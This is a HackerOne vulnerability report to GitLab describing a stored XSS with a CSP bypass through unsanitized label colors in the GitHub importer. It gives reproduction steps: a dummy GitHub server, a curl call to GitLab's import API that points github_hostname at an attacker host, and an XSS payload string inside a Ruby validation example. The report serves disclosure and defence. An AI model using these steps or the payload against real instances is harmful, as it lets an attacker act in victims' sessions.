Stored-XSS with CSP-bypass via labels' color
HackerOne report #1665658 by yvvdwf
on 2022-08-10, assigned to GitLab Team
Report
GitLab allows importing a project from GitHub. The importer also copies the labels, whose colors are not sanitized. This leads to stored XSS.
Steps to reproduce
To reproduce, we need the following prerequisites:
- GitHub does not allow creating arbitrary label colors, so the attachment contains a dummy GitHub server instead.
- A VM/machine with a public IP that gitlab.com can reach, to host the dummy server.
- I created the dummy server using Node.js, so Node.js must also be installed on that machine.
- A GitLab personal access token created with the api scope.
Step 1: run the dummy server
- Copy the attachment to your machine and decompress it into any folder, e.g., /tmp/dummy-server
- Go to /tmp/dummy-server, then run this command: node ./index.js YOUR_IP YOUR_PORT
  in which you replace YOUR_IP and YOUR_PORT with your own values. For example: sudo node index.js 51.75.74.52 80
Step 2: trigger the GitLab import
- Open a new terminal, then run the following command, in which:
  - YOUR_IP and YOUR_PORT are the values from the previous step
  - YOUR_GITLAB_TOKEN is the api token you created in the prerequisites
  - YOUR_GITLAB_USERNAME is the target namespace to import the project into. It can be your username or a group name
curl -kv "https://gitlab.com/api/v4/import/github" \
--request POST \
--header "content-type: application/json" \
--header "PRIVATE-TOKEN: YOUR_GITLAB_TOKEN" \
--data '{
"personal_access_token": "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"repo_id": "523303538",
"target_namespace": "YOUR_GITLAB_USERNAME",
"new_name": "xss-on-label-color",
"github_hostname": "http://YOUR_IP:YOUR_PORT"
}'
For example:
curl -kv "https://gitlab.com/api/v4/import/github" \
--request POST \
--header "content-type: application/json" \
--header "PRIVATE-TOKEN: AAAAAAAAAAAAAYYYYabc" \
--data '{
"personal_access_token": "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"repo_id": "523303538",
"target_namespace": "yvvdwf",
"new_name": "xss-on-label-color",
"github_hostname": "http://51.75.74.52:80"
}'
After the import finishes, view the label list of the imported project. You should see a popup created by this JS: alert(document.domain)
An example is available here (private project): https://gitlab.com/yvvdwf/xss-on-label-color/-/labels
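The root cause is that the importer stores whatever string the remote "GitHub" API returns as the label color, and that string is later rendered into the label markup. The following Ruby snippet is an added example (not GitLab's own code or the reporter's dummy server) of the ingest-side check an importer should apply: accept only the hex forms GitHub actually returns (6 hex digits without a leading '#', plus the '#'-prefixed 3- or 6-digit forms), canonicalize to '#RRGGBB', and fall back to a default for anything else. The regex, the fallback color '#428BCA' and the function names are assumptions made for this example.

```ruby
# Added example, not GitLab code: validate and normalise a label colour at
# import time so that an attacker-controlled "GitHub" API cannot smuggle
# markup or script through the colour field.

# Hex colour: optional '#', then 3 or 6 hex digits (\h). Assumed policy.
HEX_COLOR = /\A#?(?:\h{3}|\h{6})\z/

# Fallback used when the remote value is not a colour. Assumed value.
DEFAULT_LABEL_COLOR = '#428BCA'

# Returns a canonical '#RRGGBB' string, or nil when the input is not a colour.
def normalize_label_color(raw)
  return nil unless raw.is_a?(String)

  value = raw.strip
  return nil unless value.match?(HEX_COLOR)

  value = value.delete_prefix('#')
  # Expand the short form (#abc -> #aabbcc) so callers see one shape only.
  value = value.chars.map { |c| c * 2 }.join if value.length == 3
  "##{value.upcase}"
end

# Importer-side check: keep the colour if it is valid, otherwise fall back.
def sanitize_label_color(raw)
  normalize_label_color(raw) || DEFAULT_LABEL_COLOR
end

# The pattern the report describes, kept for contrast: the remote value is
# prefixed and stored as-is, so anything survives into the rendered page.
def unsafe_label_color(raw)
  "##{raw}"
end

# Inline style for a label chip; only ever built from the sanitised colour.
def label_style(raw)
  "background-color: #{sanitize_label_color(raw)}"
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs: two real GitHub colours, one payload, two junk.
  samples = ['d73a4a', '#FFF', 'x"><img src=x onerror=alert(document.domain)>', 'red', nil]
  samples.each do |c|
    puts "#{c.inspect.ljust(55)} unsafe=#{unsafe_label_color(c).inspect.ljust(58)} safe=#{sanitize_label_color(c)}"
  end
end
```

The validation happens before the value is persisted, so the stored label never carries the payload and every later rendering path (label list, issue sidebar, API responses) is protected by the same check rather than relying on output encoding at each site.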
Impact
Stored-XSS with CSP-bypass allows attackers to execute arbitrary actions on behalf of victims at the client side.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!